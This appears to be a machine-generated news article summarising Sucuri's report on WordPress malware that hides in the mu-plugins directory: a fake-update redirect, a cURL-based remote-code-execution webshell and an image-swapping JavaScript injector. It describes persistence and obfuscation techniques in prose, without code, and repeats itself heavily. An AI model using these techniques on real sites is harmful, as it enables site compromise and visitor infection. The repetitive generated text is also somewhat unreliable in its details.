Ethical Hacking News
In a recent discovery, Sucuri researchers exposed the use of WordPress malware targeting sites through the mu-plugins directory, allowing attackers to evade detection and inject malicious code stealthily. The third malware detected by Sucuri is a JavaScript injector that replaces site images with explicit content and hijacks links to open malicious popups. This reveals how attackers are exploiting vulnerabilities in the mu-plugins directory to maintain persistence and manipulate traffic for malicious purposes.
The attacks employ obfuscated PHP, utilizing functions like eval() to run arbitrary code stealthily. Two cases of malware have been identified: a fake update redirect (redirect.php) that tricks users into executing malicious code, leading to data theft and further infections; and a Remote Code Execution Webshell that enables persistent control and ongoing infections.
The discovery highlights the need for strong security measures, such as regular monitoring, file integrity checks, and web application firewalls. It underscores the creativity and persistence of attackers in hiding malware deep within WordPress installations, emphasizing the importance of proactive security measures to prevent these types of sophisticated attacks.
Sucuri has detected a malware campaign targeting WordPress sites by exploiting the mu-plugins directory. The attackers can bypass traditional security checks, making it challenging to detect and remove malicious code. A JavaScript injector in custom-js-loader.php replaces site images with explicit content and hijacks links to open malicious popups. Malicious plugins are being used as backdoors to execute arbitrary code stealthily, harming site reputation and user experience. The mu-plugins directory is an attractive location for attackers due to its auto-loading feature without activation or appearing in the standard plugin list. Attackers use obfuscated PHP in mu-plugins to execute hidden payloads and manipulate website behavior. Malware has been detected hiding in the mu-plugins directory, including a fake update redirect and a Remote Code Execution Webshell. Website administrators should remain vigilant and adopt proactive security measures to prevent these types of sophisticated attacks.
Sucuri, a renowned security firm, has recently uncovered a sophisticated and evasive malware campaign targeting WordPress sites by exploiting the mu-plugins directory. This particular vector is noteworthy because it allows attackers to bypass traditional security checks and inject malicious code stealthily, rendering detection and removal more challenging.
The third malware detected by Sucuri is a JavaScript injector in custom-js-loader.php that replaces site images with explicit content and hijacks links to open malicious popups. It ensures persistence in the mu-plugins folder, harming the site’s reputation and user experience while manipulating traffic for malicious purposes. This particular example illustrates how attackers are utilizing the mu-plugins directory as an ideal location for backdoors, allowing them to execute arbitrary code stealthily.
In February, Sucuri warned of threat actors exploiting WordPress mu-plugins, which auto-load without activation, to maintain persistence and evade detection by hiding backdoors in the plugin directory. The security firm noted that unlike regular plugins, must-use plugins are automatically loaded on every page load, without needing activation or appearing in the standard plugin list. This characteristic makes it an attractive location for attackers seeking to maintain persistence and evade detection.
Attackers have been using obfuscated PHP in mu-plugins to execute hidden payloads from /wp-content/uploads/2024/12/index.txt, utilizing the functions eval() to run arbitrary code stealthily. The script constructs a URL, sends requests to an external server, fetches content via file_get_contents() or cURL, modifies robots.txt, checks response markers, and pings sitemaps. These actions enable attackers to manipulate website behavior, evade detection, and facilitate redirections.
Sucuri researchers have identified two cases of malware hiding in the mu-plugins directory, each employing different methods to compromise WordPress sites. The first malware is a fake update redirect (redirect.php) that selectively redirects visitors to a malicious site while avoiding bots and admins to evade detection. Disguised as a WordPress function, it tricks users into executing malicious code, leading to data theft, backdoors, and further infections, compromising site security.
The second malware is a Remote Code Execution Webshell. A sophisticated attack in index.php disguises itself as a plugin, using cURL to fetch and execute a remote PHP script. This allows attackers to inject new malware dynamically without altering the file, enabling persistent control and ongoing infections.
The presence of this malware can be identified by most obvious signs. One prominent indicator is unusual behavior on the site, such as unauthorized redirections of users to external malicious websites. Additionally, suspicious files with uncommon or misleading names appear within the mu-plugins directory, often mimicking legitimate plugins. Website administrators may also notice elevated server resource usage with no clear explanation, along with unexpected file modifications or the inclusion of unauthorized code in critical directories.
The escalating use of the mu-plugins directory by attackers underscores their creativity and persistence in hiding malware deep within WordPress installations. Regular security monitoring, file integrity checks, and web application firewalls (WAFs) are essential in keeping such infections at bay. As highlighted by Sucuri, it is crucial for website administrators to remain vigilant and adopt proactive security measures to prevent these types of sophisticated attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Hiding-in-Plain-Sight-The-Sophisticated-Malware-Tactics-Targeting-WordPress-Sites-through-Mu-Plugins-ehn.shtml
https://securityaffairs.com/176083/malware/wordpress-malware-in-the-mu-plugins-directory.html
Published: Tue Apr 1 03:44:59 2025 by llama3.2 3B Q4_K_M
